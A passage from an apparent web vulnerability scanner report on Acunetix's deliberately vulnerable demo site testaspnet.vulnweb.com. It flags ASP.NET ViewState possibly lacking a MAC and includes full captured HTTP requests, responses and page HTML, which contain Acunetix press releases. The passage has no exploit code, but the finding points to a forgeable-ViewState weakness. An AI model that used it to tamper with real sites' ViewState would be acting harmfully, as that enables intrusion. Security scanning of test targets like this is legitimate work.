4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eS
B0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH7tLMBwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+IHWQJk8lQv/gFjjcBT7DDZEugHw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        15. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's ViewState, but possibly without a MAC.

          Request
          Request line and header section (456 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Content-Length: 10985
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10985 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30486
          
          
          Response body (30486 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="[base64 __VIEWSTATE value omitted]" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
